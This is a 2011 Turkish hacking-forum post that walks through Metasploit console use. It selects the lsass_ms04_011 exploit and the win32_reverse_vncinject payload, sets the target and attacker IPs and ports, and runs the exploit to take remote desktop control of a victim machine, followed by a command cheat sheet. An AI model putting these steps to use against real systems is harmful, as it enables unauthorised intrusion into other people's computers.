Yeni Sitemize Yönlendiriliyorsunuz !

Join the forum, it's quick and easy

Yeni Sitemize Yönlendiriliyorsunuz !

Would you like to react to this message? Create an account in a few clicks or log in to continue.

    Metasploit Kullanımı

    BOZKURT
    BOZKURT


    Mesaj Sayısı : 343 Aldığı teşekkürler : 5574 Nereden : evden Kayıt Tarihi : 06/02/11

    Metasploit Kullanımı Empty Metasploit Kullanımı

    Mesaj tarafından BOZKURT Ptsi Mayıs 02, 2011 5:52 pm

    Metasploit nedir?

    Metasploit, popüler ve yararlı exploitlerin daha ileri seviyede özellikler eklenip, bizlerin hizmetine sunulmuş bir framework çalışmasıdır. İçerisinde şuan 90 dan fazla exploit, 75 kadar payload vardır. En güzel özelliğiyse güncellenmesidir. Programı otomatik olarak 'update' edebilirsiniz.

    Kurulumdan sonra Başlat>Programlar>Metasploit Framework>MSFupdate i açıp güncelleyelim. Güncelleme bitince bunu bir mesajla haber verir ve $isim gibi birşey çıkar. 'exit komutuyla MSFupdate konsolundan çıkalım.


    Artık başlayabiliriz...

    1-) Başlat>Programlar>Metasploit Framework>MSFConsole u açalım. Konsoldasınız ve şu şekilde bir komut satırı çıkar; msf>

    2-)
    *Exploit listesine bakalım-> Bunun için 'show exploits' komutunu yazıp entar a basın.
    *Listeden bize gereken exploiti belirleyelim-> Örnek olarak çok tehlikeli bir exploit olan 'lsass_ms04_011' i seçtim, bu exploit ile hedef bilgisayara trojan olmaksızın girmeye çalışacağım. Bir exploiti seçmek için şu komutu kullanırız-> 'use lsass_ms04_011' Artık komut satırı değişti ve şu oldu : 'msf lsass_ms04_011>'

    3-)
    *Payload seçelim-> Her exploitin mutlaka bir payload ı (kısacası saldırı çeşidi ve hedefi diyelim) vardır. Payloadları görmek için kullanmamız gereken kod 'show payloads'
    Biz listenin en altındaki payloadı seçiyoruz. Eğer listedeki payloadların görevlerini görmek isterseniz 'info payloadadı' komutunu kullanın.
    *Payload ıseçmek için 'set PAYLOAD payloadadı' komutunu kullanmamız gerekiyor. Biz en alttakini seçiyoruz 'set PAYLOAD'win32_reverse_vncinject'
    Önemli not: Payloadı seçerken Payload büyük harfle yazılmalıdır.

    4-)Artık yapmamız gereken sadece bir iki ayar kaldı. Gerekli ayarları görmek için ise 'show options' komutunu kullanıyoruz.
    Karşmıza liste çıktı. Bu listedeki Required yazanlar mutlaka tanımlanmalıdır... optinal yazanlar ise size kalmış.
    *Bizim örneğimizde required yazan 2 ayar var, hemen tanımlayalım.

    *Sırasıyla şu komutları girelim;

    'set RHOST hedefip'
    'set LHOST kendinizinipadresi'
    Dikkat: Required yazanların bazıları önceden tanımlıdır değiştirmeye gerek yok.

    5-)Son adım. Eğer herşey yolunda gittiyse (ayarlarda hata yapmadıysak) exploiti çalıştıralım.
    Bunun için ise 'exploit' komutunu yazıyoruz.

    Kullandığım exploitin özelliğinden dolayı eğer başarılı olduysak uzak masaüstü bağlantısı ile karşı bilgisayara girebilirim. Bilmeyenler için: bir pencere açılır ve onun masaüstüne bağlanmış olurum, sürücülerini gezebilirim vs vs.

    -----------------------------------
    BAZI ÖNEMLİ KOMUTLAR
    'use exploitadı' exploiti seçer
    'info exploitadı' exploit hakkında bilgi verir, aynı şekilde payloadadını yazarsanır payload bilgisi verir.
    'set PAYLOAD payloadadı' payloadı seçer.
    'set AYARADI parametre' ayaradını yazdığınız öğeye parametre tanımlar.
    'show options' yapmanız gereken özel ayarlar.
    'show exploits' exploit listesi
    'show payloads' payload listesi
    'set RHOST hedef' hedefi ayarlamanızı sağlar.
    'set LHOST ip' sizin ip adresiniz ([Linkleri görebilmeniz için 1 kaç saniyenizi ayırıp üye olmanız gerekiyor. ipbul.com dan öğrenebilirsiniz)
    'set RPORT 129' hedef portunu 129 yapar-siz gerekliyse değiştireceksiniz tabii
    'set LPORT 5400' sizin portunuz (not:adsl kullanıyorsanız port açmayı unutmayın)
    'show targets' eğer varsa hedef sistem versiyonlarını seçersiniz
    'set TARGET targetno' targetno numaralı hedef sistem
    'exploit' exploiti çalıştırır ayarlar tamamsa çalışır, yoksa "missing required option" hatası verir

      Forum Saati Cuma Mayıs 10, 2024 1:59 am